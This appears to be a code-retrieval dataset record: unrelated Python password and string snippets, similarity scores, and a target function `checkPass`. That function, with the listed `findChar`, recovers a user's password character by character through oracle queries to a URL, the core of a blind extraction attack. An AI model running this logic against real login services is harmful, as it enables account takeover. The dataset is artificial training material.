k=len_uppercase_letters)\n digits_ = choices(digits, k=len_digits)\n puncts = []\n\n return ''.join(sample(lower_letters + upper_letters + digits_ + puncts, k=length))", "def test_user1_method3():\n REGEX_MATCH_BCRYPT_HASH = r\"^\\$2[ayb]\\$.{56}$\"\n hashed_password = u.password.decode()\n assert re.match(REGEX_MATCH_BCRYPT_HASH, hashed_password), \"Password was not hashed correctly\"", "def acceptable_password(password):\r\n LOG.debug(\"PASS\")\r\n LOG.debug(password)\r\n\r\n if password is not None:\r\n LOG.debug(len(password))\r\n\r\n if password is None:\r\n return False\r\n\r\n if len(password) < 3:\r\n return False\r\n\r\n return True", "def check_pass(text):\r\n\r\n upperRegex = re.compile(r'[A-Z]')\r\n lowerRegex = re.compile(r'[a-z]')\r\n lengthRegex = re.compile(r'.{8,}')\r\n digitRegex = re.compile(r'\\d')\r\n\r\n if not upperRegex.search(text):\r\n return False\r\n elif not lowerRegex.search(text):\r\n return False\r\n elif not lengthRegex.search(text):\r\n return False\r\n elif not digitRegex.search(text):\r\n return False\r\n else:\r\n return True", "def clean_password2(self):\n\t\tpassword = self.cleaned_data['password']\n\t\trepetir_password = self.cleaned_data['repetir_password']\n\t\tif password != repetir_password:\n\t\t\traise forms.ValidationError('Las contraseñas no coinciden.')\n\t\treturn repetir_password", "def decypher(s):\n return \"\".join(map(chr, [97+(ord(c)-95)%25 if c.isalpha() else ord(c) for c in s]))", "def valid_pw(name, password, h):\n salt = h.split(',')[0]\n return h == make_pw_hash(name, password, salt)", "def validate_password(self):\n # source: https://docs.python.org/2/howto/regex.html\n if not re.match(r\"[A-Za-z0-9@#]\", self.password):\n return 'Oops!, invalid password'\n elif len(self.password) < 6:\n return 'Password should be at least six characters long'\n return 'Valid password!'", "def clean_password2(self):\n\t\tpassword = self.cleaned_data['password']\n\t\trepetir_password = self.cleaned_data['repetir_password']\n\t\tif password != repetir_password:\n\t\t\traise forms.ValidationError('Las contrasenas no coinciden.')\n\t\treturn repetir_password", "def is_unique_chars_compare(string):\n\n for i, char in enumerate(string):\n for j, 
other_chars in enumerate(string):\n if i != j and char == other_chars:\n return False\n return True", "def check_for_validity_puzzle_2(pos: tuple, char: str, password: str):\n\n valid_pos, invalid_pos = pos\n # using xor\n if (password[valid_pos-1] == char) ^ (password[invalid_pos-1] == char):\n return True\n else:\n return False", "def find_message(text: str) -> str:\n if not all(ch in string.printable for ch in text):\n return\n elif not text:\n return \"\"\n if len(text) > 1000:\n return\n decode_message = \"\"\n # check case sensitive for a simple character in string\n for correct_char in [char for char in text\\\n if char.upper() == char and char.lower()\\\n in 'abcdefghijklmnopqrstuwxyz']:\n decode_message += correct_char\n return decode_message", "def validate_password1(self, password):\n return get_adapter().clean_password(password)", "def get_common_letters(word1: str, word2: str) -> str:\n\n common = ''\n for x, y in zip(word1, word2):\n if x == y:\n common += x\n\n return common" ]
[ "0.66974944", "0.64420664", "0.6421295", "0.642044", "0.63667226", "0.6365107", "0.6325546", "0.63089836", "0.6299588", "0.62728053", "0.62592286", "0.62546295", "0.6249797", "0.62487674", "0.6225312", "0.6205716", "0.62037766", "0.62024164", "0.6148876", "0.61458707", "0.6145218", "0.6120198", "0.6100961", "0.60869384", "0.6068112", "0.6067736", "0.60442996", "0.601255", "0.6002502", "0.5998498", "0.59979874", "0.5948396", "0.5947907", "0.59188366", "0.59037656", "0.59032005", "0.5885434", "0.5878207", "0.58678347", "0.5864101", "0.5846066", "0.58369035", "0.58335286", "0.5825666", "0.581921", "0.58060634", "0.58051544", "0.57935154", "0.57844275", "0.57827276", "0.5781435", "0.5776363", "0.5772614", "0.5771557", "0.57671905", "0.5753883", "0.57477826", "0.5741665", "0.5735398", "0.5724702", "0.5724702", "0.5718353", "0.56877375", "0.5686999", "0.5683717", "0.5682275", "0.5682005", "0.567174", "0.5670818", "0.56676155", "0.5635476", "0.56330276", "0.56325436", "0.5626855", "0.5621922", "0.56202704", "0.5616364", "0.5614659", "0.5605607", "0.56017774", "0.5598326", "0.559773", "0.5590348", "0.5588864", "0.5577842", "0.55727905", "0.55678123", "0.55618083", "0.5561223", "0.55586827", "0.5546096", "0.55366874", "0.5521966", "0.551844", "0.55181146", "0.5507557", "0.5506553", "0.5504492", "0.55039006", "0.5500972", "0.54983485" ]
0.0
-1
checks for a character at position i, and records it when the character at position i is found.
def checkPass(username, url, charList, n):
    """Recover the password one character at a time, up to n characters."""
    password = ""
    for i in range(n):
        if testPassword(password, username, url):
            return password  # full password found
        ch = findChar(username, url, charList, i)
        try:
            password += ch
        except TypeError:
            # findChar returned a non-string (no character matched at index i);
            # coerce it so the recovered prefix stays a string
            password += str(ch)
    return password  # only reached if the password is longer than n characters
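A minimal, self-contained sketch of the same character-by-character recovery loop, runnable without the remote service. The SECRET constant and the two stub oracles below are hypothetical stand-ins for the real testPassword / checkPasswordCharacter checks, which query the given url:

import string

SECRET = "s3cret"  # hypothetical target, for illustration only

def testPassword(password, username=None, url=None):
    # stand-in for the remote full-password check
    return password == SECRET

def checkPasswordCharacter(ch, username=None, url=None, index=0):
    # stand-in for the remote per-character check
    return index < len(SECRET) and SECRET[index] == ch

def findChar(username, url, charList, i):
    for ch in charList:
        if checkPasswordCharacter(ch, username, url, index=i):
            return ch
    return ""

def checkPass(username, url, charList, n):
    password = ""
    for i in range(n):
        if testPassword(password, username, url):
            return password
        password += findChar(username, url, charList, i)
    return password

print(checkPass(None, None, string.ascii_lowercase + string.digits, 10))  # -> s3cret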
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def inside_char(self, char, marker, tracker, i):\n if char == marker[0]:\n tracker.append(i)\n elif char == marker[1]:\n try:\n tracker.pop()\n except IndexError:\n pass\n return tracker", "def _charToIndex(self,ch): \n return self.char_dict[ch]", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def _get_char(self):\r\n self._i += 1\r\n if self._i < len(self._text):\r\n self._char = self._text[self._i]\r\n else:\r\n self._char = -1", "def index(xy):\n if len(xy) != 2:\n return 'Not a valid string'\n\n with open('ch.txt', encoding=\"utf-8\") as file:\n chars = file.read()\n print(chars)\n for i in range(len(chars)):\n if chars.contains(xy[0]): \n return 'Yeah'", "def locate_char(c, s):\n return [i for i, l in enumerate(s) if l == c]", "def FindChar(self, char, repeat=1, reverse=False, extra_offset=0):\n text, pos = self.GetCurLine()\n oldpos = pos\n if not reverse:\n # search forward\n for i in range(repeat):\n pos = text.find(char, pos+1)\n if pos == -1:\n return\n else:\n # search backward\n for i in range(repeat):\n pos = text.rfind(char, 0, pos)\n if pos == -1:\n return\n\n newpos = pos + extra_offset\n if newpos in range(len(text)):\n self.MoveCaretPos(newpos - oldpos)", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findChar(self, position, spaceLength ):\n leer=0 ## numeator of empty column\n Queue=[] ##this will help in serching for neighbours of pixels\n PiksList=[] ##list of balck piksels, of with consist the charakter\n length, high = self.getSize()\n \n while (position < length and self.vLineHistogram(position)==0): #serching for a first not empty line, for given position\n position+=1\n leer+=1\n if position == length: ## check if it is Space or it is End of line\n return position, \"Enter\", 0\n elif leer>=spaceLength:\n return position, \"Space\", 0\n else:\n for i in range(0,high): ##extracting all black pixels from this line\n if self.getPixel(position, i)<128:\n Queue.append((position, i))\n PiksList.append((position, i))\n\n while len(Queue)>0:\n Piksel=Queue.pop(0) ##geting firs element from Queue\n neighbourhood=[(Piksel[0]-1, Piksel[1]+1),(Piksel[0]-1, Piksel[1]),(Piksel[0]-1, Piksel[1]-1),(Piksel[0], 
Piksel[1]+1),(Piksel[0], Piksel[1]-1),(Piksel[0]+1, Piksel[1]+1),(Piksel[0]+1, Piksel[1]),(Piksel[0]+1, Piksel[1]-1)]\n ##to co wyzej to lista współrzędnych sąsiadów Piksela\n\n for neighbour in neighbourhood: ##cheking neighbourhood of each pixel\n if not(neighbour in PiksList) and (neighbour[0] in range(0,length)) and (neighbour[1] in range(0,high)) and self.getPixel(neighbour[0],neighbour[1])==0:\n Queue.append(neighbour)\n PiksList.append(neighbour)\n \n PiksList.sort() ##sorts list with number of column\n\n \n PiksList=self.addHigherPiks(PiksList) ##adds all piksel over finden pixels\n PiksList.sort()\n position1,High1=PiksList[0]\n position2,High2=PiksList[len(PiksList)-1] ## geting number of smalest and biggest column in group\n charLength=position2-position1\n if len(PiksList)>5: ##checkin if there are more then 5 piksels in group to eliminate case, when there are single pixels not eliminated by initial fomating\n if charLength<high: ##check if the length of finden group of pixels isn't bigger then length of tile\n newPosition= position1+(charLength/2) ##new position in the center of finden char to eliminate case, when one char is over the second\n Char=CharFrame(high,high) ##create new CrarFrame object\n \n for el in PiksList: ##making all pixels in PiksList black in ChatFrame object and white in self(LineFrame object)\n Char.putPixel(el[0]-position1,el[1])\n self.makeWhite(el[0],el[1])\n \n Char.reScale(30,30) #scaling CharFrame to the ening size\n \n return newPosition, Char, charLength/2\n\n else: ##length of goup of pixels is too big\n PiksList, Char = reconChar(PiksList,high) ## finding where to divide group of pixels\n for Piks in PiksList:\n self.makeWhite(Piks[0],Piks[1])\n position1,High1=PiksList[0]\n position2,High2=PiksList[len(PiksList)-1] ## geting number of smalest and biggest column in group\n charLength=position2-position1\n newPosition= position1+(charLength/2) ##new position in the center of finden char to eliminate case, when one char is over the second\n return newPosition, Char, charLength/2\n else: ##if there is less then 5 pixels in group\n for el in PiksList: ##making all pixels in PiksList white in self(LineFrame object)\n self.makeWhite(el[0],el[1])\n newPosition= position1+(charLength/2)\n return newPosition, \"None\", charLength/2", "def match(self, ch):\n if ch == self.string[self.idx]:\n # sys.stderr.write(\"{} found at pos {}\\n\".format(ch, self.idx))\n self.idx += 1\n if self.idx == self.slen:\n sys.stdout.write(self.func(self.string))\n self.idx = 0\n self._status = DONE\n else:\n self._status = STORING\n return True\n else:\n if self.idx > 0:\n sys.stdout.write(self.string[0:self.idx])\n self.idx = 0\n self._status = NOMATCH\n return False", "def _get_charindex(self, x, y):\r\n verts = self.shapes[0].buf[0].vertices\r\n x = x - self.x + verts[2][0]\r\n y = y - self.y + verts[0][1]\r\n nv = len(verts)\r\n for i in range(0, nv, 4):\r\n vtr = verts[i] # top right\r\n vbl = verts[i + 2] # bottom left\r\n if x >= vbl[0] and x < vtr[0] and y >= vbl[1] and y < vtr[1]:\r\n i = int(i / 4)\r\n c_i = self.c_lookup[i]\r\n if c_i == (len(self.txt) - 1) or self.c_lookup[i + 1] > c_i + 1:\r\n if (vtr[0] - x) < (x - vbl[0]):\r\n c_i += 1\r\n return c_i\r\n return len(self.txt)", "def alphabet_position(char):\n if type(char) != type(''):\n return -1\n if len(char) != 1:\n return -1\n if char.isalpha():\n return lowerLetters.find(char.lower())\n return -1", "def find(strng, ch):\n ix = 0\n while ix < len(strng):\n if strng[ix] == ch:\n return ix\n ix += 1\n 
return -1", "def _insChar(self, char, pos, color):\n char, vertices, glyph = self._extractGlyph(char, glm.vec4(color))\n if not self.text:\n off, kern = self._updateMetric(pos, char)\n if char in self.NO_GLYPH_CHARS:\n self.colors.insert(pos, [char, None])\n else:\n vertices['vtx'] += off + glyph['offset']\n self.allVertices = np.hstack(vertices)\n self.allIndices = self._baseInd\n self.colors.insert(pos, [char, color])\n self.text += char\n else:\n self.logger.debug(\"Inserting %r at %d\" % (char, pos))\n nonGlyph = countInSet(self.text[:pos], self.NO_GLYPH_CHARS)\n # Arrange vertices\n if pos < len(self.text):\n self.allVertices = self.allVertices[:(pos - nonGlyph) * 4]\n self.allIndices = self.allIndices[:pos - nonGlyph]\n\n # Set the metric\n off, kern = self._updateMetric(pos, char)\n if char in self.NO_GLYPH_CHARS:\n color = None\n else:\n vertices['vtx'] += off + kern + glyph['offset']\n if self.allVertices is None:\n self.allVertices = np.hstack(vertices)\n else:\n self.allVertices = np.append(self.allVertices, vertices)\n if self.allIndices is None:\n self.allIndices = self._baseInd\n else:\n self.allIndices = np.vstack((self.allIndices,\n self._baseInd + (pos - nonGlyph) * 4))\n\n self.colors.insert(pos, [char, color])\n if pos < len(self.text):\n self.text = self.text[:pos] + char + self.text[pos:]\n self._updateGlyphs(pos, char)\n else:\n self.text += char", "def putchar(self, col, row, char, color=GREEN):\n for j in range(FONT_HEIGHT - 5):\n v = self.font[ord(char)][3 + j]\n for i in range(FONT_WIDTH):\n if v & (1 << (7 - i)):\n self.putpixel(col + i, row + j, color)\n else:\n self.putpixel(col + i, row + j, BLACK)", "def getchar(words,pos):\n\n\tif pos<0 or pos>=len(words): return None\n\n\treturn words[pos]", "def print_a_char(i):\n\n if i == len(myString):\n # base case: end of string, just return\n print(\"debuggin base case ... now i = \" + str(i))\n return\n else:\n print(\"debuggin recursion ... 
now i = \" + str(i))\n # recursive case:\n # print char at current index\n # increment index,\n # call itself recursively\n print( myString[i] )\n i = i + 1\n print_a_char(i)\n \n # end of function print_a_char()", "def character(index):\n # Default: act as a dummy.\n return index", "def find_letter(self,letter):\n for i in range(0,len(self._word)):\n if self._word[i] == letter:\n self.new_string[i] = letter\n\n if letter not in self._word:\n self.letters_wrong += 1\n\n self.selected_letters += letter + ', '\n return self.print_new_word(self.new_string)", "def letterToIndex(letter):\n if letter not in all_letters:\n letter = remove_tone_marks(letter)\n\n return all_letters.find(letter) + 1", "def char(self, aIndex, char):\n o = ord(char)\n c = -1\n # space\n if o == 32:\n c = 16\n # dash\n if o == 45:\n c = 17\n # uppercase A-F\n if 65 <= o <= 70:\n c = o - 55\n # lowercase a-f\n if 97 <= o <= 102:\n c = o - 87\n # 0-9\n if 48 <= o <= 57:\n c = o - 48\n\n self.digit(aIndex, c)", "def _get_index(self, character):\n OFFSET = 65 # ascii value of 'A' since the first element should be 'A'\n index = ord(character) - OFFSET\n return index", "def check_char(self, char: str) -> None:\n while len(char) > 1:\n char = input(\"Enter only a char -> \")\n char = char.lower()\n if char in self.word:\n indexes = []\n tmp_word = list(self.word)\n while char in tmp_word:\n index = tmp_word.index(char)\n indexes.append(index)\n tmp_word[index] = \"\"\n for i in indexes:\n self.word2[i] = char\n else:\n self.errors += 1\n print(f\"This char isn't in the word -> +1 Error {self.errors}/{self.attempts}\")", "def index_of_x(word: str, position=0):\n\tif word[position] == 'x': \n\t\treturn position \n\telse:\n\t\treturn index_of_x(word, position + 1)", "def alphabet_position(letter):\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n pos = 0\n for ltr in alphabet:\n if ltr == letter.lower():\n return pos\n pos += 1\n return pos", "def find(self,s, ch):\r\n return [i for i, ltr in enumerate(s) if ltr == ch]", "def test_string_insertion(a_string, a_character):\n for position in range(0, len(a_string)+1):\n print a_string[:position] + a_character + a_string[position:]", "def Appliquer(auto, char):\n\tetat = 0\n\ti=0\n\tfinal = -1\n\twhile i<len(char) and etat != -1:\n\t\t#~ print char[i], etat, auto.delta[etat][ord(char[i])]\n\t\tetat = auto.delta[etat][ord(char[i])]\n\t\tif etat in auto.F:\n\t\t\tfinal = i\n\t\ti+=1\n\t\n\treturn final", "def research_pos(self, map_list, character): \n list_pos = []\n for y in range(15): \n for x, c in enumerate(map_list[y]):\n if character in c and c == character:\n list_pos.append((x*50, y*50)) \n return list_pos", "def compute_escape(pos):\n z = 0 + 0j;\n for i in range(ESCAPE):\n z = z ** 2 + pos\n if abs(z) > 2:\n break\n return i", "def alphabet_position(letter):\n\n alphabet='abcdefghijklmnopqrstuvwxyz'\n ALPHABET='ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n if letter.isupper() == True:\n for x in ALPHABET:\n if letter == x:\n position = ALPHABET.index(x)\n return position\n\n else:\n for x in alphabet:\n if letter == x:\n position = alphabet.index(x)\n return position", "def findChar(username, url, charList, i):\n for ch in charList:\n if(checkPasswordCharacter(ch, username, url, index = i)):\n return ch\n #only runs if no ch in charList match:\n # return i #oof, there's no match if i is out of bounds, e.g. 
len(password) < i\n print(\"Missing: \" + i) #so I know when it's not a match\n return \"\" #return an empty string instead\n # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). \n # If wildCards is false, this will just skip characters that don't match anything!", "def cons(self, i):\n\t\tif self.b[i] == 'a' or self.b[i] == 'e' or self.b[i] == 'i' or self.b[i] == 'o' or self.b[i] == 'u':\n\t\t\treturn 0\n\t\tif self.b[i] == 'y':\n\t\t\tif i == self.k0:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\treturn (not self.cons(i - 1))\n\t\treturn 1", "def write_char(self, char, token, string_index=None,\n set_cursor_position=False, z_index=False):\n assert len(char) == 1\n\n char_obj = Char(char, token, z_index)\n char_width = char_obj.get_width()\n\n # In case there is no more place left at this line, go first to the\n # following line. (Also in case of double-width characters.)\n if self._x + char_width > self.size.columns:\n self._y += 1\n self._x = 0\n\n insert_pos = self._y, self._x # XXX: make a Point of this?\n\n if string_index is not None:\n self._cursor_mappings[string_index] = insert_pos\n\n if set_cursor_position:\n self.cursor_position = Point(y=self._y, x=self._x)\n\n # Insertion of newline\n if char == '\\n':\n self._y += 1\n self._x = 0\n self._line_number += 1\n\n # Insertion of a 'visible' character.\n else:\n if char_obj.z_index >= self._buffer[self._y][self._x].z_index:\n self._buffer[self._y][self._x] = char_obj\n\n # When we have a double width character, store this byte in the\n # second cell. So that if this character gets deleted afterwarsd,\n # the ``output_screen_diff`` will notice that this byte is also\n # gone and redraw both cells.\n if char_width > 1:\n self._buffer[self._y][self._x+1] = Char(six.unichr(0))\n\n # Move position\n self._x += char_width\n\n return insert_pos", "def check_direction(self,word,pos,d):\r\n self.word_found = [self.word[0]] #this is a list of the characters found in the word in the particular direction\r\n self.current_pos = pos #the position you start at - i.e the first character of the word\r\n self.pos_checked = [pos] #list containing all the positions we have checked so far\r\n \r\n \r\n while self.check_match(self.word_found,self.word):\r\n check = 0\r\n #check if length of word found is same is length of the word yoou are searching for\r\n if (len(self.word) == len(self.word_found)):\r\n \r\n #correct word has been found !\r\n #print('word found!')\r\n \r\n #change these characters to red to highlight the word\r\n #print(self.word_found)\r\n \r\n self.highlight_word(self.pos_checked)\r\n \r\n return True\r\n \r\n \r\n else:\r\n #word isnt correct length, move to next coordinate and try again\r\n self.current_pos = [self.current_pos[0] + d[0], self.current_pos[1] + d[1]] \r\n #current_pos = [initial x pos + x indices of direction,\r\n self.pos_checked.append(self.current_pos) \r\n #print(self.current_pos) \r\n # initial y pos + y indices of direction]\r\n \r\n if self.valid_coordinate(self.current_pos[0],self.current_pos[1]):\r\n self.word_found.append(self.wordsearch[self.current_pos[0]][self.current_pos[1]]) \r\n #add new character to word found\r\n else:\r\n return #word not found - out of worsearch range\r", "def indexOf(self, p_str): # real signature unknown; restored from __doc__\n return 0", "def indexOf(self, p_str): # real signature unknown; restored from __doc__\n return 0", "def return_index(character: str) -> int:\n if character.islower():\n return ord(character) - ord(\"a\")\n else:\n 
return ord(character) - ord(\"A\")", "def display_position(game_board: list, character: list):\n print(\"You are currently here:\")\n for position in game_board:\n if position[0] == character[0] and position[1] == character[1]:\n print('C', end=\" \")\n else:\n print(\"*\", end=\" \")\n if position[1] == game_board[-1][1]:\n print(\"\")", "def f_index(self, substring, direction=[]):\n substr = self.value(substring)\n if \"back\" in direction:\n pos = self._val.rfind(substr)\n else:\n pos = self._val.find(substr)\n\n return pos + 1", "def findWithStart(astring, achar, start=0):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithStart(astring, achar, start=0):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithStart(astring, achar, start=0):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def _put(self, char: str, index: int = 0) -> None:\n # pylint: disable=too-many-return-statements\n if not 0 <= index < self._chars:\n return\n index = self._adjusted_index(index)\n if self._chardict and char in self._chardict:\n self._set_buffer(index, self._chardict[char])\n return\n char = char.lower()\n if char == \".\":\n self._set_buffer(index, self._get_buffer(index) | 0b10000000)\n return\n if char in \"abcdefghijklmnopqrstuvwxy\":\n character = ord(char) - 97 + 10\n elif char == \"-\":\n character = 36\n elif char in \"0123456789\":\n character = ord(char) - 48\n elif char == \" \":\n self._set_buffer(index, 0x00)\n return\n elif char == \":\":\n self._set_buffer(4, 0x02)\n return\n elif char == \";\":\n self._set_buffer(4, 0x00)\n return\n elif char in \"lL\":\n self._set_buffer(index, 0b00111000)\n return\n elif char in \"oO\":\n self._set_buffer(index, 0b00111111)\n return\n else:\n return\n self._set_buffer(index, NUMBERS[character])", "def find(string:str, char:str) -> List[int]:\n return [i for i, ltr in enumerate(string) if ltr == char]", "def simple(self, string):\n\n temp = self\n i = 0\n while temp != 0:\n if string[i] < temp.ch:\n temp = temp.left\n elif string[i] > temp.ch:\n temp = temp.right\n else:\n i = i + 1\n if i == len(string):\n return temp.flag\n temp = temp.center\n\n return 0", "def _get_pos_from_key(key, char):\n return [i+1 for i, c in enumerate(key) if c == char]", "def display_board(board: list, character: list):\n for index in range(len(board)):\n for index_two in range(len(board[index])):\n current_position = [index, index_two]\n if current_position == character:\n if index_two == len(board[index]) - 1:\n print('c')\n else:\n print('c', end=\" \")\n else:\n if index_two == len(board[index]) - 1:\n print('x')\n else:\n print('x', end=\" \")", "def replace_char_candidate(self, char):\n for couple in self.char_couples:\n for i in range(2):\n if couple[i] == char:\n if i == 0:\n return couple[1]\n else:\n return couple[0]", "def find_letter_in_dics(self,letter):\r\n if str.isupper(letter)==True and letter not in self.special_letters_dic and letter not in self.special_characters_dic: #taken from above\r\n position=self.general_upper_word_list[letter]\r\n elif str.islower(letter)==True and letter not in self.special_letters_dic and letter not in 
self.special_characters_dic:\r\n position=self.general_lower_word_list[letter]\r\n elif self.special_characters_dic!=None and letter in self.special_characters_dic:\r\n position=self.special_characters_dic[letter]\r\n elif letter in self.special_letters_dic:\r\n position=self.special_letters_dic[letter]\r\n elif letter in self.general_numbers_dic:\r\n position=self.general_numbers_dic[letter]\r\n return position", "def map_char(self, char):\n for key, pattern in self.char_map.items():\n if char in pattern:\n return key\n return 'U'", "def cvc(self, i):\n\t\tif i < (self.k0 + 2) or not self.cons(i) or self.cons(i-1) or not self.cons(i-2):\n\t\t\treturn 0\n\t\tch = self.b[i]\n\t\tif ch == 'w' or ch == 'x' or ch == 'y':\n\t\t\treturn 0\n\t\treturn 1", "def isIceAct(string, pos):\n return string == 0 and pos == 1", "def find_word(self,word):\r\n self.start_pos = []\r\n #check each row\r\n for i in range(0,len(self.wordsearch)):\r\n #check each column\r\n for j in range(0, len(self.wordsearch[i])):\r\n #find all coordinates which have the first letter of the word and store them\r\n if self.wordsearch[i][j] == self.word[0]:\r\n self.start_pos.append([i,j])\r\n \r\n \r\n #print(count)\r\n for pos in self.start_pos:\r\n if self.check_start(self.word, pos):\r\n \r\n return", "def fn(ss):\n i = cnt = 0\n for ch in s: \n if ss[i] == ch: \n i += 1\n if i == len(ss): \n if (cnt := cnt + 1) == k: return True \n i = 0\n return False", "def write_highlighted_at_pos(self, y, x, data, z_index=0):\n for token, text in data:\n for c in text:\n char_obj = Char(c, token, z_index)\n self.write_at_pos(y, x, char_obj)\n x += char_obj.get_width()", "def _findExMark(self):\n c_i = 0\n while c_i < len(self.c) and self.c[c_i] != '!':\n c_i += 1\n\n if c_i+1 < len(self.c):\n iRet = self.c[c_i+1:]\n self.code = self.c[:c_i]\n return iRet\n\n return ''", "def next_char(keys, index):\n backspaces = 0\n\n while index >= 0:\n if keys[index] == \"<\":\n backspaces += 1\n else:\n if backspaces == 0:\n return index\n backspaces -= 1\n index -= 1\n\n return -1", "def search(self, word):\n pointer = self.tries\n for i in range(len(word)):\n ascii = ord(word[i]) - ord('a')\n if pointer[ascii] == None:\n return False\n pointer = pointer[ascii]\n if word in pointer[26:]:\n return True\n else:\n return False", "def check_match(self, word_found,word): \r\n self.count = 0\r\n for char in self.word_found:\r\n if char != self.word[self.count]:\r\n return False\r\n self.count +=1\r\n #print(self.count)\r\n \r\n return True", "def chars_match (found, word):\n index = 0\n for i in found:\n if (i != word[index]):\n return False\n index += 1\n return True", "def character(x):\n if (x==\"a\"or x==\"A\"or x==\"e\"or x==\"E\"or x==\"i\"or x==\"I\"or x==\"o\"or x==\"O\"or x==\"u\"or x==\"U\"):\n return('True')\n else:\n return('False')", "def ctrl_f(self):\n if self.index < len(self.string):\n self.index += 1", "def findall(string,chars):\n nb = len(chars) \n return [ pos for pos, c in enumerate(string)\n if pos + nb <= len(string) and string[pos:pos + nb] == chars]", "def isvalidposition(pdic,iprime,distance):\r\n \r\n # deal with base shifts \r\n distance = distance-2\r\n \r\n istforbidden = 0\r\n for o in range(-distance,distance+2,1):\r\n if (iprime+o in pdic):\r\n # E = end of orf\r\n # S = start of orf\r\n if((pdic[iprime+o]==\"E\") or (pdic[iprime+o]==\"S\")):\r\n if((o >3) or (o <-3)):\r\n pass\r\n else:\r\n istforbidden = 1\r\n break\r\n else:\r\n istforbidden = 1\r\n break\r\n else:\r\n pass\r\n \r\n return(istforbidden)", "def 
findWithEnd(astring, achar, start=0, end=None):\n ix = start\n if end == None:\n end = len(astring)\n\n found = False\n while ix < end and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithEnd(astring, achar, start=0, end=None):\n ix = start\n if end == None:\n end = len(astring)\n\n found = False\n while ix < end and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithEnd(astring, achar, start=0, end=None):\n ix = start\n if end == None:\n end = len(astring)\n\n found = False\n while ix < end and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def read_until(self, chars):\n\n start_index = self.index\n\n while self.index < self.length and self.xtext[self.index] not in chars:\n self.index += 1\n\n assert self.index < self.length\n\n return self.xtext[start_index:self.index]", "def _put(self, char: str, index: int = 0) -> None:\n if not 0 <= index < self._chars:\n return\n if not 32 <= ord(char) <= 127:\n return\n if char == \".\":\n self._set_buffer(\n self._adjusted_index(index * 2 + 1),\n self._get_buffer(self._adjusted_index(index * 2 + 1)) | 0b01000000,\n )\n return\n character = ord(char) * 2 - 64\n self._set_buffer(self._adjusted_index(index * 2), CHARS[1 + character])\n self._set_buffer(self._adjusted_index(index * 2 + 1), CHARS[character])", "def getCharAtPos(self, row, col):\n return self.maze[row][col]", "def ind_pos(position, ind, current_geno, chr_starts, chr_ends):\n ind_starts = chr_starts[ind]\n ind_ends = chr_ends[ind]\n #print [position, ind, current_geno, ind_starts, ind_ends]\n in_interval = False\n for interval in range(len(ind_starts)):\n if position > int(ind_starts[interval]) and position < int(ind_ends[interval]):\n in_interval = True\n break\n if in_interval:\n return(current_geno)\n else:\n return(\"./.\")", "def compute_revoffset_pos(seq, pos):\n\n cnt = 0 \n for c in seq:\n if c in msa_characters:\n cnt += 1\n return pos - cnt", "def advance(self):\n self.pos += 1\n if self.pos < len(self.text):\n self.current_char = self.text[self.pos]\n else:\n self.current_char = None", "def _put_chr_at(self, char, row, col, color, adjustment_x=.19, adjustment_y=.19):\n self._goto_piece_xy(row, col, adjustment_x, adjustment_y)\n self.pen.color(color)\n self.pen.write(char, font=(\"Courier\", round(self.square_side_size * .7),\n \"normal\"))", "def _current_char(self):\r\n\r\n return self._input_string[self._index]", "def translate(l, a, c):\n try:\n i = int(l[0])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[1].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n try:\n i = int(l[2])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[3].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n return True", "def set_char_at(s, index, c):\n l = list(s)\n l[index] = c\n return ''.join(l)", "def toindex(col, row):\n a2z = 'ABCDEFGHIJLKMNOPQRSTUVWXYZ'\n\n total = 0\n mult = 0\n for char in col:\n total += (a2z.find(char) + (26 * mult))\n mult += 1\n\n return total, row - 1", "def get_bad_char(self, string, size):\n bad_char = [-1] * self.NO_OF_CHARS\n for i in range(size):\n # ord('A') == chr(65)\n bad_char[ord(string[i])] = i\n\n return bad_char", "def loop1(self, move, new_state, i):\n if move == i[0]:\n # 
